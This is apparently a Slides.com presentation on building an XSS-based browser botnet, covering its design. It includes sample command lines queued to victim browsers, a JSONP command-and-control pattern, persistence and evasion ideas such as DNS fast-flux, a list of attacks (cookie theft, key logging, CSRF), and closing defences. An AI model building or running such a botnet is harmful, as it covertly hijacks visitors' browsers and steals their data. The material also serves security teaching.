XSS Botnet

Luke Tsekouras
luke.tsekouras@gmail.com


What's that?


XSS

Execution of unwanted Javascript in a website

Botnet

A large number of computers under your command



My Goals


  • Stick to the Standards
  • Remote Control
  • Client Persistence
  • Being Covert


Let's skip to the demo




Dear demo Gods,
fuck you.



So, who wants to join my botnet?


Use Incognito Mode

http://weill.cse.unsw.edu.au:2685/
Look for Spongebob

copy pasta

Say Hi
queue 100, hi: false, -> alert 'o hai there!'; ___.save hi: true
Filter by OS
queue 100, boo: false, OS: 'Linux', -> alert 'boo'; ___.save boo: true
Perform actions
queue 100, thing: false, -> $audio = ___.$('<audio autoplay src="http://soundbible.com/grab.php?id=1542&type=mp3"></audio>').appendTo('body'); ___.$('iframe').contents().click(-> $audio[0].play()); ___.save thing: true
queue -> ___.$.ajax url: 'http://weill.cse.unsw.edu.au:2685/talk/http%3A%2F%2F3.bp.blogspot.com%2F-9XnJMfXnlO4%2FT0CcyoAekpI%2FAAAAAAAAnHo%2F3-kUYndhly8%2Fs1600%2FDSCN4873.JPG', type: 'POST', data: talk: 'kekeke'



Stick to the Standards


  • No bug exploitation
  • Cross-platform - jQuery
  • Future-proof


Remote Control



Two approaches


  • JSONP
  • Embedded commands


Remote Control



JSONP

  • Circumvents cross-domain policies
  • Requires command centre
<script src="http://some.external.site/some/action?name=value">
    returnValue('{"the":"data"}')Íž
</script>


Remote Control



Embedded Commands

  • Commands left within the page
  • Results can take command's place


Client Persistence



Two approaches

  • IFrame wrap
  • AJAX swap


Client Persistence



IFrame Wrap

  • Seamless and bad-ass
  • Vulnerable to IFrame protection


CLIENT PERSISTENCE



AJAX Persistence

  • Transforms all page loads to AJAX
  • A bit buggy


Being Covert


  • Seamless iFrame swap
  • Change URLs appropriately
  • Back/Forward buttons work
  • Hour glass on loads
  • Catch POST requests (AJAX version)
  • All commands/results are RSA encrypted


Being Covert


Could've been a bit sneakier


  • Obvious bugs in AJAX mode
  • Command Centre is traceable
    • Solution: DNS Fast-flux


Potential Attacks


  • Stealing cookies
  • Key logging
  • Request sniffing
  • Link swapping
  • Cross-Site Request Forgery
  • Distributed computing
  • People power


Defence Against the Dark Arts



  • Content Security Policy
  • X-Frame-Options
  • Cross-Site Request Forgery Protection



Thanks


Feel free to contact me at
luke.tsekouras@gmail.com

And check out the code at

XSS Botnet

By Luke Tsekouras

Made with Slides.com

XSS Botnet

  • 2,839

More from Luke Tsekouras